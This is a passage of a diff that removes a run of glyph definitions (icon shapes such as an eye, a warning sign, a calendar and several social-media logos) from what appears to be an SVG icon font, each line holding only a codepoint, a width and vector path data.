-<glyph unicode="&#xf06d;" horiz-adv-x="1408" d="M1408 -160v-64q0 -13 -9.5 -22.5t-22.5 -9.5h-1344q-13 0 -22.5 9.5t-9.5 22.5v64q0 13 9.5 22.5t22.5 9.5h1344q13 0 22.5 -9.5t9.5 -22.5zM1152 896q0 -78 -24.5 -144t-64 -112.5t-87.5 -88t-96 -77.5t-87.5 -72t-64 -81.5t-24.5 -96.5q0 -96 67 -224l-4 1l1 -1 q-90 41 -160 83t-138.5 100t-113.5 122.5t-72.5 150.5t-27.5 184q0 78 24.5 144t64 112.5t87.5 88t96 77.5t87.5 72t64 81.5t24.5 96.5q0 94 -66 224l3 -1l-1 1q90 -41 160 -83t138.5 -100t113.5 -122.5t72.5 -150.5t27.5 -184z" />
-<glyph unicode="&#xf06e;" horiz-adv-x="1792" d="M1664 576q-152 236 -381 353q61 -104 61 -225q0 -185 -131.5 -316.5t-316.5 -131.5t-316.5 131.5t-131.5 316.5q0 121 61 225q-229 -117 -381 -353q133 -205 333.5 -326.5t434.5 -121.5t434.5 121.5t333.5 326.5zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5 t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1792 576q0 -34 -20 -69q-140 -230 -376.5 -368.5t-499.5 -138.5t-499.5 139t-376.5 368q-20 35 -20 69t20 69q140 229 376.5 368t499.5 139t499.5 -139t376.5 -368q20 -35 20 -69z" />
-<glyph unicode="&#xf070;" horiz-adv-x="1792" d="M555 201l78 141q-87 63 -136 159t-49 203q0 121 61 225q-229 -117 -381 -353q167 -258 427 -375zM944 960q0 20 -14 34t-34 14q-125 0 -214.5 -89.5t-89.5 -214.5q0 -20 14 -34t34 -14t34 14t14 34q0 86 61 147t147 61q20 0 34 14t14 34zM1307 1151q0 -7 -1 -9 q-105 -188 -315 -566t-316 -567l-49 -89q-10 -16 -28 -16q-12 0 -134 70q-16 10 -16 28q0 12 44 87q-143 65 -263.5 173t-208.5 245q-20 31 -20 69t20 69q153 235 380 371t496 136q89 0 180 -17l54 97q10 16 28 16q5 0 18 -6t31 -15.5t33 -18.5t31.5 -18.5t19.5 -11.5 q16 -10 16 -27zM1344 704q0 -139 -79 -253.5t-209 -164.5l280 502q8 -45 8 -84zM1792 576q0 -35 -20 -69q-39 -64 -109 -145q-150 -172 -347.5 -267t-419.5 -95l74 132q212 18 392.5 137t301.5 307q-115 179 -282 294l63 112q95 -64 182.5 -153t144.5 -184q20 -34 20 -69z " />
-<glyph unicode="&#xf071;" horiz-adv-x="1792" d="M1024 161v190q0 14 -9.5 23.5t-22.5 9.5h-192q-13 0 -22.5 -9.5t-9.5 -23.5v-190q0 -14 9.5 -23.5t22.5 -9.5h192q13 0 22.5 9.5t9.5 23.5zM1022 535l18 459q0 12 -10 19q-13 11 -24 11h-220q-11 0 -24 -11q-10 -7 -10 -21l17 -457q0 -10 10 -16.5t24 -6.5h185 q14 0 23.5 6.5t10.5 16.5zM1008 1469l768 -1408q35 -63 -2 -126q-17 -29 -46.5 -46t-63.5 -17h-1536q-34 0 -63.5 17t-46.5 46q-37 63 -2 126l768 1408q17 31 47 49t65 18t65 -18t47 -49z" />
-<glyph unicode="&#xf072;" horiz-adv-x="1408" d="M1376 1376q44 -52 12 -148t-108 -172l-161 -161l160 -696q5 -19 -12 -33l-128 -96q-7 -6 -19 -6q-4 0 -7 1q-15 3 -21 16l-279 508l-259 -259l53 -194q5 -17 -8 -31l-96 -96q-9 -9 -23 -9h-2q-15 2 -24 13l-189 252l-252 189q-11 7 -13 23q-1 13 9 25l96 97q9 9 23 9 q6 0 8 -1l194 -53l259 259l-508 279q-14 8 -17 24q-2 16 9 27l128 128q14 13 30 8l665 -159l160 160q76 76 172 108t148 -12z" />
-<glyph unicode="&#xf073;" horiz-adv-x="1664" d="M128 -128h288v288h-288v-288zM480 -128h320v288h-320v-288zM128 224h288v320h-288v-320zM480 224h320v320h-320v-320zM128 608h288v288h-288v-288zM864 -128h320v288h-320v-288zM480 608h320v288h-320v-288zM1248 -128h288v288h-288v-288zM864 224h320v320h-320v-320z M512 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1248 224h288v320h-288v-320zM864 608h320v288h-320v-288zM1248 608h288v288h-288v-288zM1280 1088v288q0 13 -9.5 22.5t-22.5 9.5h-64 q-13 0 -22.5 -9.5t-9.5 -22.5v-288q0 -13 9.5 -22.5t22.5 -9.5h64q13 0 22.5 9.5t9.5 22.5zM1664 1152v-1280q0 -52 -38 -90t-90 -38h-1408q-52 0 -90 38t-38 90v1280q0 52 38 90t90 38h128v96q0 66 47 113t113 47h64q66 0 113 -47t47 -113v-96h384v96q0 66 47 113t113 47 h64q66 0 113 -47t47 -113v-96h128q52 0 90 -38t38 -90z" />
-<glyph unicode="&#xf074;" horiz-adv-x="1792" d="M666 1055q-60 -92 -137 -273q-22 45 -37 72.5t-40.5 63.5t-51 56.5t-63 35t-81.5 14.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q250 0 410 -225zM1792 256q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5v192q-32 0 -85 -0.5t-81 -1t-73 1 t-71 5t-64 10.5t-63 18.5t-58 28.5t-59 40t-55 53.5t-56 69.5q59 93 136 273q22 -45 37 -72.5t40.5 -63.5t51 -56.5t63 -35t81.5 -14.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23zM1792 1152q0 -14 -9 -23l-320 -320q-9 -9 -23 -9q-13 0 -22.5 9.5t-9.5 22.5 v192h-256q-48 0 -87 -15t-69 -45t-51 -61.5t-45 -77.5q-32 -62 -78 -171q-29 -66 -49.5 -111t-54 -105t-64 -100t-74 -83t-90 -68.5t-106.5 -42t-128 -16.5h-224q-14 0 -23 9t-9 23v192q0 14 9 23t23 9h224q48 0 87 15t69 45t51 61.5t45 77.5q32 62 78 171q29 66 49.5 111 t54 105t64 100t74 83t90 68.5t106.5 42t128 16.5h256v192q0 14 9 23t23 9q12 0 24 -10l319 -319q9 -9 9 -23z" />
-<glyph unicode="&#xf075;" horiz-adv-x="1792" d="M1792 640q0 -174 -120 -321.5t-326 -233t-450 -85.5q-70 0 -145 8q-198 -175 -460 -242q-49 -14 -114 -22q-17 -2 -30.5 9t-17.5 29v1q-3 4 -0.5 12t2 10t4.5 9.5l6 9t7 8.5t8 9q7 8 31 34.5t34.5 38t31 39.5t32.5 51t27 59t26 76q-157 89 -247.5 220t-90.5 281 q0 130 71 248.5t191 204.5t286 136.5t348 50.5q244 0 450 -85.5t326 -233t120 -321.5z" />
-<glyph unicode="&#xf076;" d="M1536 704v-128q0 -201 -98.5 -362t-274 -251.5t-395.5 -90.5t-395.5 90.5t-274 251.5t-98.5 362v128q0 26 19 45t45 19h384q26 0 45 -19t19 -45v-128q0 -52 23.5 -90t53.5 -57t71 -30t64 -13t44 -2t44 2t64 13t71 30t53.5 57t23.5 90v128q0 26 19 45t45 19h384 q26 0 45 -19t19 -45zM512 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45zM1536 1344v-384q0 -26 -19 -45t-45 -19h-384q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h384q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf077;" horiz-adv-x="1664" d="M1611 320q0 -53 -37 -90l-75 -75q-38 -38 -91 -38q-54 0 -90 38l-486 485l-486 -485q-36 -38 -90 -38t-90 38l-75 75q-38 36 -38 90q0 53 38 91l651 651q37 37 90 37q52 0 91 -37l650 -651q38 -38 38 -91z" />
-<glyph unicode="&#xf078;" horiz-adv-x="1664" d="M1611 832q0 -53 -37 -90l-651 -651q-38 -38 -91 -38q-54 0 -90 38l-651 651q-38 36 -38 90q0 53 38 91l74 75q39 37 91 37q53 0 90 -37l486 -486l486 486q37 37 90 37q52 0 91 -37l75 -75q37 -39 37 -91z" />
-<glyph unicode="&#xf079;" horiz-adv-x="1920" d="M1280 32q0 -13 -9.5 -22.5t-22.5 -9.5h-960q-8 0 -13.5 2t-9 7t-5.5 8t-3 11.5t-1 11.5v13v11v160v416h-192q-26 0 -45 19t-19 45q0 24 15 41l320 384q19 22 49 22t49 -22l320 -384q15 -17 15 -41q0 -26 -19 -45t-45 -19h-192v-384h576q16 0 25 -11l160 -192q7 -11 7 -21 zM1920 448q0 -24 -15 -41l-320 -384q-20 -23 -49 -23t-49 23l-320 384q-15 17 -15 41q0 26 19 45t45 19h192v384h-576q-16 0 -25 12l-160 192q-7 9 -7 20q0 13 9.5 22.5t22.5 9.5h960q8 0 13.5 -2t9 -7t5.5 -8t3 -11.5t1 -11.5v-13v-11v-160v-416h192q26 0 45 -19t19 -45z " />
-<glyph unicode="&#xf07a;" horiz-adv-x="1664" d="M640 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1536 0q0 -53 -37.5 -90.5t-90.5 -37.5t-90.5 37.5t-37.5 90.5t37.5 90.5t90.5 37.5t90.5 -37.5t37.5 -90.5zM1664 1088v-512q0 -24 -16 -42.5t-41 -21.5 l-1044 -122q1 -7 4.5 -21.5t6 -26.5t2.5 -22q0 -16 -24 -64h920q26 0 45 -19t19 -45t-19 -45t-45 -19h-1024q-26 0 -45 19t-19 45q0 14 11 39.5t29.5 59.5t20.5 38l-177 823h-204q-26 0 -45 19t-19 45t19 45t45 19h256q16 0 28.5 -6.5t20 -15.5t13 -24.5t7.5 -26.5 t5.5 -29.5t4.5 -25.5h1201q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf07b;" horiz-adv-x="1664" d="M1664 928v-704q0 -92 -66 -158t-158 -66h-1216q-92 0 -158 66t-66 158v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h672q92 0 158 -66t66 -158z" />
-<glyph unicode="&#xf07c;" horiz-adv-x="1920" d="M1879 584q0 -31 -31 -66l-336 -396q-43 -51 -120.5 -86.5t-143.5 -35.5h-1088q-34 0 -60.5 13t-26.5 43q0 31 31 66l336 396q43 51 120.5 86.5t143.5 35.5h1088q34 0 60.5 -13t26.5 -43zM1536 928v-160h-832q-94 0 -197 -47.5t-164 -119.5l-337 -396l-5 -6q0 4 -0.5 12.5 t-0.5 12.5v960q0 92 66 158t158 66h320q92 0 158 -66t66 -158v-32h544q92 0 158 -66t66 -158z" />
-<glyph unicode="&#xf07d;" horiz-adv-x="768" d="M704 1216q0 -26 -19 -45t-45 -19h-128v-1024h128q26 0 45 -19t19 -45t-19 -45l-256 -256q-19 -19 -45 -19t-45 19l-256 256q-19 19 -19 45t19 45t45 19h128v1024h-128q-26 0 -45 19t-19 45t19 45l256 256q19 19 45 19t45 -19l256 -256q19 -19 19 -45z" />
-<glyph unicode="&#xf07e;" horiz-adv-x="1792" d="M1792 640q0 -26 -19 -45l-256 -256q-19 -19 -45 -19t-45 19t-19 45v128h-1024v-128q0 -26 -19 -45t-45 -19t-45 19l-256 256q-19 19 -19 45t19 45l256 256q19 19 45 19t45 -19t19 -45v-128h1024v128q0 26 19 45t45 19t45 -19l256 -256q19 -19 19 -45z" />
-<glyph unicode="&#xf080;" horiz-adv-x="1920" d="M512 512v-384h-256v384h256zM896 1024v-896h-256v896h256zM1280 768v-640h-256v640h256zM1664 1152v-1024h-256v1024h256zM1792 32v1216q0 13 -9.5 22.5t-22.5 9.5h-1600q-13 0 -22.5 -9.5t-9.5 -22.5v-1216q0 -13 9.5 -22.5t22.5 -9.5h1600q13 0 22.5 9.5t9.5 22.5z M1920 1248v-1216q0 -66 -47 -113t-113 -47h-1600q-66 0 -113 47t-47 113v1216q0 66 47 113t113 47h1600q66 0 113 -47t47 -113z" />
-<glyph unicode="&#xf081;" d="M1280 926q-56 -25 -121 -34q68 40 93 117q-65 -38 -134 -51q-61 66 -153 66q-87 0 -148.5 -61.5t-61.5 -148.5q0 -29 5 -48q-129 7 -242 65t-192 155q-29 -50 -29 -106q0 -114 91 -175q-47 1 -100 26v-2q0 -75 50 -133.5t123 -72.5q-29 -8 -51 -8q-13 0 -39 4 q21 -63 74.5 -104t121.5 -42q-116 -90 -261 -90q-26 0 -50 3q148 -94 322 -94q112 0 210 35.5t168 95t120.5 137t75 162t24.5 168.5q0 18 -1 27q63 45 105 109zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5 t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf082;" d="M1307 618l23 219h-198v109q0 49 15.5 68.5t71.5 19.5h110v219h-175q-152 0 -218 -72t-66 -213v-131h-131v-219h131v-635h262v635h175zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960 q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf083;" horiz-adv-x="1792" d="M928 704q0 14 -9 23t-23 9q-66 0 -113 -47t-47 -113q0 -14 9 -23t23 -9t23 9t9 23q0 40 28 68t68 28q14 0 23 9t9 23zM1152 574q0 -106 -75 -181t-181 -75t-181 75t-75 181t75 181t181 75t181 -75t75 -181zM128 0h1536v128h-1536v-128zM1280 574q0 159 -112.5 271.5 t-271.5 112.5t-271.5 -112.5t-112.5 -271.5t112.5 -271.5t271.5 -112.5t271.5 112.5t112.5 271.5zM256 1216h384v128h-384v-128zM128 1024h1536v118v138h-828l-64 -128h-644v-128zM1792 1280v-1280q0 -53 -37.5 -90.5t-90.5 -37.5h-1536q-53 0 -90.5 37.5t-37.5 90.5v1280 q0 53 37.5 90.5t90.5 37.5h1536q53 0 90.5 -37.5t37.5 -90.5z" />
-<glyph unicode="&#xf084;" horiz-adv-x="1792" d="M832 1024q0 80 -56 136t-136 56t-136 -56t-56 -136q0 -42 19 -83q-41 19 -83 19q-80 0 -136 -56t-56 -136t56 -136t136 -56t136 56t56 136q0 42 -19 83q41 -19 83 -19q80 0 136 56t56 136zM1683 320q0 -17 -49 -66t-66 -49q-9 0 -28.5 16t-36.5 33t-38.5 40t-24.5 26 l-96 -96l220 -220q28 -28 28 -68q0 -42 -39 -81t-81 -39q-40 0 -68 28l-671 671q-176 -131 -365 -131q-163 0 -265.5 102.5t-102.5 265.5q0 160 95 313t248 248t313 95q163 0 265.5 -102.5t102.5 -265.5q0 -189 -131 -365l355 -355l96 96q-3 3 -26 24.5t-40 38.5t-33 36.5 t-16 28.5q0 17 49 66t66 49q13 0 23 -10q6 -6 46 -44.5t82 -79.5t86.5 -86t73 -78t28.5 -41z" />
-<glyph unicode="&#xf085;" horiz-adv-x="1920" d="M896 640q0 106 -75 181t-181 75t-181 -75t-75 -181t75 -181t181 -75t181 75t75 181zM1664 128q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5t90.5 37.5t37.5 90.5zM1664 1152q0 52 -38 90t-90 38t-90 -38t-38 -90q0 -53 37.5 -90.5t90.5 -37.5 t90.5 37.5t37.5 90.5zM1280 731v-185q0 -10 -7 -19.5t-16 -10.5l-155 -24q-11 -35 -32 -76q34 -48 90 -115q7 -10 7 -20q0 -12 -7 -19q-23 -30 -82.5 -89.5t-78.5 -59.5q-11 0 -21 7l-115 90q-37 -19 -77 -31q-11 -108 -23 -155q-7 -24 -30 -24h-186q-11 0 -20 7.5t-10 17.5 l-23 153q-34 10 -75 31l-118 -89q-7 -7 -20 -7q-11 0 -21 8q-144 133 -144 160q0 9 7 19q10 14 41 53t47 61q-23 44 -35 82l-152 24q-10 1 -17 9.5t-7 19.5v185q0 10 7 19.5t16 10.5l155 24q11 35 32 76q-34 48 -90 115q-7 11 -7 20q0 12 7 20q22 30 82 89t79 59q11 0 21 -7 l115 -90q34 18 77 32q11 108 23 154q7 24 30 24h186q11 0 20 -7.5t10 -17.5l23 -153q34 -10 75 -31l118 89q8 7 20 7q11 0 21 -8q144 -133 144 -160q0 -9 -7 -19q-12 -16 -42 -54t-45 -60q23 -48 34 -82l152 -23q10 -2 17 -10.5t7 -19.5zM1920 198v-140q0 -16 -149 -31 q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20 t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31zM1920 1222v-140q0 -16 -149 -31q-12 -27 -30 -52q51 -113 51 -138q0 -4 -4 -7q-122 -71 -124 -71q-8 0 -46 47t-52 68 q-20 -2 -30 -2t-30 2q-14 -21 -52 -68t-46 -47q-2 0 -124 71q-4 3 -4 7q0 25 51 138q-18 25 -30 52q-149 15 -149 31v140q0 16 149 31q13 29 30 52q-51 113 -51 138q0 4 4 7q4 2 35 20t59 34t30 16q8 0 46 -46.5t52 -67.5q20 2 30 2t30 -2q51 71 92 112l6 2q4 0 124 -70 q4 -3 4 -7q0 -25 -51 -138q17 -23 30 -52q149 -15 149 -31z" />
-<glyph unicode="&#xf086;" horiz-adv-x="1792" d="M1408 768q0 -139 -94 -257t-256.5 -186.5t-353.5 -68.5q-86 0 -176 16q-124 -88 -278 -128q-36 -9 -86 -16h-3q-11 0 -20.5 8t-11.5 21q-1 3 -1 6.5t0.5 6.5t2 6l2.5 5t3.5 5.5t4 5t4.5 5t4 4.5q5 6 23 25t26 29.5t22.5 29t25 38.5t20.5 44q-124 72 -195 177t-71 224 q0 139 94 257t256.5 186.5t353.5 68.5t353.5 -68.5t256.5 -186.5t94 -257zM1792 512q0 -120 -71 -224.5t-195 -176.5q10 -24 20.5 -44t25 -38.5t22.5 -29t26 -29.5t23 -25q1 -1 4 -4.5t4.5 -5t4 -5t3.5 -5.5l2.5 -5t2 -6t0.5 -6.5t-1 -6.5q-3 -14 -13 -22t-22 -7 q-50 7 -86 16q-154 40 -278 128q-90 -16 -176 -16q-271 0 -472 132q58 -4 88 -4q161 0 309 45t264 129q125 92 192 212t67 254q0 77 -23 152q129 -71 204 -178t75 -230z" />
-<glyph unicode="&#xf087;" d="M256 192q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 768q0 51 -39 89.5t-89 38.5h-352q0 58 48 159.5t48 160.5q0 98 -32 145t-128 47q-26 -26 -38 -85t-30.5 -125.5t-59.5 -109.5q-22 -23 -77 -91q-4 -5 -23 -30t-31.5 -41t-34.5 -42.5 t-40 -44t-38.5 -35.5t-40 -27t-35.5 -9h-32v-640h32q13 0 31.5 -3t33 -6.5t38 -11t35 -11.5t35.5 -12.5t29 -10.5q211 -73 342 -73h121q192 0 192 167q0 26 -5 56q30 16 47.5 52.5t17.5 73.5t-18 69q53 50 53 119q0 25 -10 55.5t-25 47.5q32 1 53.5 47t21.5 81zM1536 769 q0 -89 -49 -163q9 -33 9 -69q0 -77 -38 -144q3 -21 3 -43q0 -101 -60 -178q1 -139 -85 -219.5t-227 -80.5h-36h-93q-96 0 -189.5 22.5t-216.5 65.5q-116 40 -138 40h-288q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5h274q36 24 137 155q58 75 107 128 q24 25 35.5 85.5t30.5 126.5t62 108q39 37 90 37q84 0 151 -32.5t102 -101.5t35 -186q0 -93 -48 -192h176q104 0 180 -76t76 -179z" />
-<glyph unicode="&#xf088;" d="M256 1088q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1408 512q0 35 -21.5 81t-53.5 47q15 17 25 47.5t10 55.5q0 69 -53 119q18 32 18 69t-17.5 73.5t-47.5 52.5q5 30 5 56q0 85 -49 126t-136 41h-128q-131 0 -342 -73q-5 -2 -29 -10.5 t-35.5 -12.5t-35 -11.5t-38 -11t-33 -6.5t-31.5 -3h-32v-640h32q16 0 35.5 -9t40 -27t38.5 -35.5t40 -44t34.5 -42.5t31.5 -41t23 -30q55 -68 77 -91q41 -43 59.5 -109.5t30.5 -125.5t38 -85q96 0 128 47t32 145q0 59 -48 160.5t-48 159.5h352q50 0 89 38.5t39 89.5z M1536 511q0 -103 -76 -179t-180 -76h-176q48 -99 48 -192q0 -118 -35 -186q-35 -69 -102 -101.5t-151 -32.5q-51 0 -90 37q-34 33 -54 82t-25.5 90.5t-17.5 84.5t-31 64q-48 50 -107 127q-101 131 -137 155h-274q-53 0 -90.5 37.5t-37.5 90.5v640q0 53 37.5 90.5t90.5 37.5 h288q22 0 138 40q128 44 223 66t200 22h112q140 0 226.5 -79t85.5 -216v-5q60 -77 60 -178q0 -22 -3 -43q38 -67 38 -144q0 -36 -9 -69q49 -74 49 -163z" />
-<glyph unicode="&#xf089;" horiz-adv-x="896" d="M832 1504v-1339l-449 -236q-22 -12 -40 -12q-21 0 -31.5 14.5t-10.5 35.5q0 6 2 20l86 500l-364 354q-25 27 -25 48q0 37 56 46l502 73l225 455q19 41 49 41z" />
-<glyph unicode="&#xf08a;" horiz-adv-x="1792" d="M1664 940q0 81 -21.5 143t-55 98.5t-81.5 59.5t-94 31t-98 8t-112 -25.5t-110.5 -64t-86.5 -72t-60 -61.5q-18 -22 -49 -22t-49 22q-24 28 -60 61.5t-86.5 72t-110.5 64t-112 25.5t-98 -8t-94 -31t-81.5 -59.5t-55 -98.5t-21.5 -143q0 -168 187 -355l581 -560l580 559 q188 188 188 356zM1792 940q0 -221 -229 -450l-623 -600q-18 -18 -44 -18t-44 18l-624 602q-10 8 -27.5 26t-55.5 65.5t-68 97.5t-53.5 121t-23.5 138q0 220 127 344t351 124q62 0 126.5 -21.5t120 -58t95.5 -68.5t76 -68q36 36 76 68t95.5 68.5t120 58t126.5 21.5 q224 0 351 -124t127 -344z" />
-<glyph unicode="&#xf08b;" horiz-adv-x="1664" d="M640 96q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-119 0 -203.5 84.5t-84.5 203.5v704q0 119 84.5 203.5t203.5 84.5h320q13 0 22.5 -9.5t9.5 -22.5q0 -4 1 -20t0.5 -26.5t-3 -23.5t-10 -19.5t-20.5 -6.5h-320q-66 0 -113 -47t-47 -113v-704 q0 -66 47 -113t113 -47h288h11h13t11.5 -1t11.5 -3t8 -5.5t7 -9t2 -13.5zM1568 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45z" />
-<glyph unicode="&#xf08c;" d="M237 122h231v694h-231v-694zM483 1030q-1 52 -36 86t-93 34t-94.5 -34t-36.5 -86q0 -51 35.5 -85.5t92.5 -34.5h1q59 0 95 34.5t36 85.5zM1068 122h231v398q0 154 -73 233t-193 79q-136 0 -209 -117h2v101h-231q3 -66 0 -694h231v388q0 38 7 56q15 35 45 59.5t74 24.5 q116 0 116 -157v-371zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-960q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf08d;" horiz-adv-x="1152" d="M480 672v448q0 14 -9 23t-23 9t-23 -9t-9 -23v-448q0 -14 9 -23t23 -9t23 9t9 23zM1152 320q0 -26 -19 -45t-45 -19h-429l-51 -483q-2 -12 -10.5 -20.5t-20.5 -8.5h-1q-27 0 -32 27l-76 485h-404q-26 0 -45 19t-19 45q0 123 78.5 221.5t177.5 98.5v512q-52 0 -90 38 t-38 90t38 90t90 38h640q52 0 90 -38t38 -90t-38 -90t-90 -38v-512q99 0 177.5 -98.5t78.5 -221.5z" />
-<glyph unicode="&#xf08e;" horiz-adv-x="1792" d="M1408 608v-320q0 -119 -84.5 -203.5t-203.5 -84.5h-832q-119 0 -203.5 84.5t-84.5 203.5v832q0 119 84.5 203.5t203.5 84.5h704q14 0 23 -9t9 -23v-64q0 -14 -9 -23t-23 -9h-704q-66 0 -113 -47t-47 -113v-832q0 -66 47 -113t113 -47h832q66 0 113 47t47 113v320 q0 14 9 23t23 9h64q14 0 23 -9t9 -23zM1792 1472v-512q0 -26 -19 -45t-45 -19t-45 19l-176 176l-652 -652q-10 -10 -23 -10t-23 10l-114 114q-10 10 -10 23t10 23l652 652l-176 176q-19 19 -19 45t19 45t45 19h512q26 0 45 -19t19 -45z" />
-<glyph unicode="&#xf090;" d="M1184 640q0 -26 -19 -45l-544 -544q-19 -19 -45 -19t-45 19t-19 45v288h-448q-26 0 -45 19t-19 45v384q0 26 19 45t45 19h448v288q0 26 19 45t45 19t45 -19l544 -544q19 -19 19 -45zM1536 992v-704q0 -119 -84.5 -203.5t-203.5 -84.5h-320q-13 0 -22.5 9.5t-9.5 22.5 q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q66 0 113 47t47 113v704q0 66 -47 113t-113 47h-288h-11h-13t-11.5 1t-11.5 3t-8 5.5t-7 9t-2 13.5q0 4 -1 20t-0.5 26.5t3 23.5t10 19.5t20.5 6.5h320q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf091;" horiz-adv-x="1664" d="M458 653q-74 162 -74 371h-256v-96q0 -78 94.5 -162t235.5 -113zM1536 928v96h-256q0 -209 -74 -371q141 29 235.5 113t94.5 162zM1664 1056v-128q0 -71 -41.5 -143t-112 -130t-173 -97.5t-215.5 -44.5q-42 -54 -95 -95q-38 -34 -52.5 -72.5t-14.5 -89.5q0 -54 30.5 -91 t97.5 -37q75 0 133.5 -45.5t58.5 -114.5v-64q0 -14 -9 -23t-23 -9h-832q-14 0 -23 9t-9 23v64q0 69 58.5 114.5t133.5 45.5q67 0 97.5 37t30.5 91q0 51 -14.5 89.5t-52.5 72.5q-53 41 -95 95q-113 5 -215.5 44.5t-173 97.5t-112 130t-41.5 143v128q0 40 28 68t68 28h288v96 q0 66 47 113t113 47h576q66 0 113 -47t47 -113v-96h288q40 0 68 -28t28 -68z" />
-<glyph unicode="&#xf092;" d="M394 184q-8 -9 -20 3q-13 11 -4 19q8 9 20 -3q12 -11 4 -19zM352 245q9 -12 0 -19q-8 -6 -17 7t0 18q9 7 17 -6zM291 305q-5 -7 -13 -2q-10 5 -7 12q3 5 13 2q10 -5 7 -12zM322 271q-6 -7 -16 3q-9 11 -2 16q6 6 16 -3q9 -11 2 -16zM451 159q-4 -12 -19 -6q-17 4 -13 15 t19 7q16 -5 13 -16zM514 154q0 -11 -16 -11q-17 -2 -17 11q0 11 16 11q17 2 17 -11zM572 164q2 -10 -14 -14t-18 8t14 15q16 2 18 -9zM1536 1120v-960q0 -119 -84.5 -203.5t-203.5 -84.5h-224q-16 0 -24.5 1t-19.5 5t-16 14.5t-5 27.5v239q0 97 -52 142q57 6 102.5 18t94 39 t81 66.5t53 105t20.5 150.5q0 121 -79 206q37 91 -8 204q-28 9 -81 -11t-92 -44l-38 -24q-93 26 -192 26t-192 -26q-16 11 -42.5 27t-83.5 38.5t-86 13.5q-44 -113 -7 -204q-79 -85 -79 -206q0 -85 20.5 -150t52.5 -105t80.5 -67t94 -39t102.5 -18q-40 -36 -49 -103 q-21 -10 -45 -15t-57 -5t-65.5 21.5t-55.5 62.5q-19 32 -48.5 52t-49.5 24l-20 3q-21 0 -29 -4.5t-5 -11.5t9 -14t13 -12l7 -5q22 -10 43.5 -38t31.5 -51l10 -23q13 -38 44 -61.5t67 -30t69.5 -7t55.5 3.5l23 4q0 -38 0.5 -103t0.5 -68q0 -22 -11 -33.5t-22 -13t-33 -1.5 h-224q-119 0 -203.5 84.5t-84.5 203.5v960q0 119 84.5 203.5t203.5 84.5h960q119 0 203.5 -84.5t84.5 -203.5z" />
-<glyph unicode="&#xf093;" horiz-adv-x="1664" d="M1280 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1536 64q0 26 -19 45t-45 19t-45 -19t-19 -45t19 -45t45 -19t45 19t19 45zM1664 288v-320q0 -40 -28 -68t-68 -28h-1472q-40 0 -68 28t-28 68v320q0 40 28 68t68 28h427q21 -56 70.5 -92 t110.5 -36h256q61 0 110.5 36t70.5 92h427q40 0 68 -28t28 -68zM1339 936q-17 -40 -59 -40h-256v-448q0 -26 -19 -45t-45 -19h-256q-26 0 -45 19t-19 45v448h-256q-42 0 -59 40q-17 39 14 69l448 448q18 19 45 19t45 -19l448 -448q31 -30 14 -69z" />
